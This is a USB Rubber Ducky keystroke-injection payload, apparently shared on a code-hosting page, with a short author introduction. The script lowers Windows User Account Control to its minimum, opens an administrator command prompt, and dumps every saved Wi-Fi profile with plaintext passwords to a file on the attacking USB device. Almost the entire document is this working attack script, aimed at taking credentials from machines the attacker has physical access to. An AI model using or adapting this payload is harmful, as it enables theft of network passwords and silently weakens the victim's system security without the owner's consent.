81 lines
2.3 KiB
Markdown
81 lines
2.3 KiB
Markdown
This payload is designed to retrieve all save wireless networks and their passwords, on a windows 7-10 machine. I have modified the normal way around bypassing UAC because i found that on some machines, the alert prompt where we would typically say "ALT y" or "LEFTARROW ENTER", is sometimes not the focus of the screen.. this method goes right into the UAC settings and lowers it to the min.
|
|
|
|
REM --> Auth- eliddell
|
|
REM --> for use with TwinDuck on windows 7+
|
|
REM --> This duck will take all saved wireless networks and save their info including passwords/keys, to a text file on your duck
|
|
DEFAULT_DELAY 75
|
|
DELAY 3000
|
|
REM --> Minimize all windows
|
|
WINDOWS d
|
|
DELAY 500
|
|
REM run CMD as admin to see network passwords/keys
|
|
REM sometimes the admin prompt does not take focus on machines with secure desktop we will force UAC to min
|
|
CONTROL ESCAPE
|
|
DELAY 300
|
|
STRING useraccountcontrolsettings
|
|
ENTER
|
|
DELAY 300
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 300
|
|
DOWNARROW
|
|
DOWNARROW
|
|
DOWNARROW
|
|
DOWNARROW
|
|
TAB
|
|
ENTER
|
|
DELAY 300
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 300
|
|
CONTROL ESCAPE
|
|
DELAY 300
|
|
STRING cmd
|
|
CTRL-SHIFT ENTER
|
|
DELAY 300
|
|
REM Change directories because System32 appears to be protected.
|
|
STRING CD %TEMP%
|
|
ENTER
|
|
REM Make batch file that waits for SD card to mount.
|
|
REM Delete batch file if already exists
|
|
STRING erase /Q DuckyWait.bat
|
|
ENTER
|
|
STRING copy con DuckyWait.bat
|
|
ENTER
|
|
REM DuckyWait.bat contents
|
|
STRING :while1
|
|
ENTER
|
|
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
|
|
ENTER
|
|
STRING if Exist %myd% (
|
|
ENTER
|
|
STRING goto break
|
|
ENTER
|
|
STRING )
|
|
ENTER
|
|
STRING timeout /t 30
|
|
ENTER
|
|
STRING goto while1
|
|
ENTER
|
|
STRING :break
|
|
ENTER
|
|
REM
|
|
REM once mounted switch to ducky dir for ease of dumping log to txt
|
|
STRING %myd%
|
|
ENTER
|
|
DELAY 500
|
|
REM iterate through all saved wlan profiles and print saved info for each
|
|
STRING for /f "tokens=4 delims=: " %%A in ('netsh wlan show profiles') do netsh wlan show profiles name=%%A key=clear >>wlanProfiles.txt
|
|
CONTROL z
|
|
ENTER
|
|
REM run duckywait
|
|
STRING DuckyWait.bat
|
|
ENTER
|
|
DELAY 500
|
|
STRING exit
|
|
ENTER
|
|
WINDOWS d
|
|
|
|
|
|
|